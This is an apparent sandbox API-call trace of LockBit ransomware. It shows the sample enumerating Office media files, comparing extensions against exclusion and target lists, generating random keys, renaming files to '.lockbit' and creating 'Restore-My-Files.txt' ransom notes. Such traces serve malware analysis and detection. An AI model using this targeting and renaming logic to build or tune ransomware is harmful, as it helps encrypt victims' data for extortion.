PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF") returned=".WMF" [0196.845] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.845] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.846] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.846] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF.lockbit") returned 70 [0196.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0205462.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.849] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.849] malloc (_Size=0x40068) returned 0x3df0008 [0196.849] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9112) returned 1 [0196.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.850] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.855] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.855] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.855] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.856] free (_Block=0x1fa2ed8) [0196.856] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.856] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.856] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89603200, ftCreationTime.dwHighDateTime=0x1be4d5e, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x89603200, ftLastWriteTime.dwHighDateTime=0x1be4d5e, nFileSizeHigh=0x0, nFileSizeLow=0x11e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0205466.WMF", cAlternateFileName="")) returned 1 [0196.856] lstrcmpiW (lpString1=".", lpString2="J0205466.WMF") returned -1 [0196.856] lstrcmpiW (lpString1="..", lpString2="J0205466.WMF") returned -1 [0196.856] PathFindExtensionW (pszPath="J0205466.WMF") returned=".WMF" [0196.856] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.856] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.857] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.857] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0205466.WMF") returned 1 [0196.858] lstrcmpiW (lpString1="ntldr", lpString2="J0205466.WMF") returned 1 [0196.858] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0205466.WMF") returned 1 [0196.858] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0205466.WMF") returned -1 [0196.858] lstrcmpiW (lpString1="autorun.inf", lpString2="J0205466.WMF") returned -1 [0196.858] lstrcmpiW (lpString1="thumbs.db", lpString2="J0205466.WMF") returned 1 [0196.858] lstrcmpiW (lpString1="iconcache.db", lpString2="J0205466.WMF") returned -1 [0196.858] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.858] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF") returned=".WMF" [0196.858] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.858] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.858] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.859] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.859] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF.lockbit") returned 70 [0196.859] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0205466.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.860] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.860] malloc (_Size=0x40068) returned 0x3df0008 [0196.860] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4578) returned 1 [0196.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.861] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.866] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.866] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.866] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.867] free (_Block=0x1fa2ed8) [0196.867] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.867] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.867] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14d9c300, ftCreationTime.dwHighDateTime=0x1be4d5f, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x14d9c300, ftLastWriteTime.dwHighDateTime=0x1be4d5f, nFileSizeHigh=0x0, nFileSizeLow=0x17f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0205582.WMF", cAlternateFileName="")) returned 1 [0196.867] lstrcmpiW (lpString1=".", lpString2="J0205582.WMF") returned -1 [0196.867] lstrcmpiW (lpString1="..", lpString2="J0205582.WMF") returned -1 [0196.867] PathFindExtensionW (pszPath="J0205582.WMF") returned=".WMF" [0196.867] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.867] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.867] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.868] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.868] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0205582.WMF") returned 1 [0196.869] lstrcmpiW (lpString1="ntldr", lpString2="J0205582.WMF") returned 1 [0196.869] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0205582.WMF") returned 1 [0196.869] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0205582.WMF") returned -1 [0196.869] lstrcmpiW (lpString1="autorun.inf", lpString2="J0205582.WMF") returned -1 [0196.869] lstrcmpiW (lpString1="thumbs.db", lpString2="J0205582.WMF") returned 1 [0196.869] lstrcmpiW (lpString1="iconcache.db", lpString2="J0205582.WMF") returned -1 [0196.869] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.869] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF") returned=".WMF" [0196.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.869] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.869] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.870] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.870] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF.lockbit") returned 70 [0196.870] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0205582.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.871] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.871] malloc (_Size=0x40068) returned 0x3df0008 [0196.871] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6130) returned 1 [0196.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.872] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.877] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.877] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.877] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.877] free (_Block=0x1fa2ed8) [0196.877] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.877] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.877] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e240a00, ftCreationTime.dwHighDateTime=0x1be560f, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3e240a00, ftLastWriteTime.dwHighDateTime=0x1be560f, nFileSizeHigh=0x0, nFileSizeLow=0xb34e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0211949.WMF", cAlternateFileName="")) returned 1 [0196.877] lstrcmpiW (lpString1=".", lpString2="J0211949.WMF") returned -1 [0196.877] lstrcmpiW (lpString1="..", lpString2="J0211949.WMF") returned -1 [0196.878] PathFindExtensionW (pszPath="J0211949.WMF") returned=".WMF" [0196.878] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 